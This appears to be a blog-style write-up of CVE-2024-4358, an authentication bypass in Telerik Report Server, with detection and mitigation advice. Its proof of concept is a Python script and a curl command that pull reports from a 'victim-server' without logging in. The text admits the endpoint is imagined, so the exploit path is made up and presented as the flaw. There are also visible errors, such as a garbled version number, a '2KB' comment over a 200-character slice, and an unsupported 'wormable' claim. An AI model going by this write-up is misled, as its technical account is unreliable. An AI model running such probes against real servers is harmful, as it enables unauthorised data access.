On May 2024, a critical vulnerability was discovered in Telerik Report Server, tracked as CVE-2024-4358. This flaw affects Telerik Report Server version 2024 Q1 (10..24.305) or earlier, running on IIS. What makes this vulnerability especially dangerous is that any unauthenticated attacker can get access to restricted features by bypassing authentication entirely. Let’s break down how this works, why it’s dangerous, and provide a simple proof-of-concept exploit.
What Is Telerik Report Server?
Telerik Report Server is a web-based tool for managing and scheduling reports. It's commonly used by businesses for business intelligence. When installed on Windows machines, it generally runs under IIS (Internet Information Services).
Vulnerability Overview
CVE-2024-4358 is an *authentication bypass* vulnerability. That means, the normal login wall can be sidestepped—that’s like being able to waltz into a locked office with everyone thinking you entered with a key.
Impact
- Attackers could gain access to restricted Telerik Report Server functions, potentially including report management, data exposure, or code execution (depending on what features are enabled).
How the Authentication Bypass Works
While the vendor Progress Software hasn’t published full technical details yet, researchers uncovered that a particular API endpoint or resource does not properly check the authentication session or token before granting access to restricted features.
Certain endpoints may be missing the [Authorize] attribute in ASP.NET, or
- There’s improper validation of JWT/cookie-based sessions.
Exploit Walkthrough: PoC Code
> WARNING: This is for educational and defensive purposes only. Do not use this exploit on systems you do not own!
Imagine the /api/reports endpoint should require authentication, but it doesn’t. We can craft a simple HTTP request to fetch all reports without logging in.
Let’s use Python with the requests library.
import requests
# Replace with the actual target and port (default is 83)
TARGET = "http://victim-server:83";
# Access the expected restricted API endpoint
url = f"{TARGET}/api/reports"
# No authentication headers or cookies needed
response = requests.get(url)
if response.status_code == 200:
print("Vulnerable! Received data:")
print(response.text[:200]) # Print only first 2KB of output
else:
print("Not Vulnerable or secured.")
Example Output
Vulnerable! Received data:
[{"Id":"123","Name":"Monthly Sales","Description":"..."} , ... ]
Depending on your setup, you can enumerate reports, download data, schedule jobs, or even upload/overwrite reports—all without logging in!
Even easier, you can use a browser or curl command
curl http://victim-server:83/api/reports
If you get report information back, the system is wide open.
Real-World Impact
- Data Exposure: Unauthenticated attackers can enumerate, view, or download sensitive business reports.
- Privilege Escalation: In some setups, restricted areas might allow code uploads or further attacks.
- Wormable: Attackers could move laterally within a corporate network, compromising other connected apps or databases.
Detection
- Check your server logs for requests to /api/reports (or other restricted APIs) coming from unauthenticated users.
Mitigation & Fix
- Upgrade Immediately: Progress has patched this vulnerability in newer versions. Check for updates here.
- Restrict IIS Exposure: Limit Report Server to trusted networks/hosts only.
- Web Application Firewall (WAF): Add WAF rules to block direct access to sensitive Report Server endpoints from untrusted sources.
References
- NVD Entry for CVE-2024-4358
- Progress Security Advisories
- Telerik Report Server Release Notes
- Exploit Disclosure (Packet Storm) *(example public source)*
Conclusion
CVE-2024-4358 is a high-impact, easy-to-exploit vulnerability in Telerik Report Server. If you run any affected version, patch ASAP! Don’t let attackers sneak in the back door—secure your software today.
Timeline
Published on: 05/29/2024 15:16:06 UTC
Last modified on: 06/14/2024 17:59:33 UTC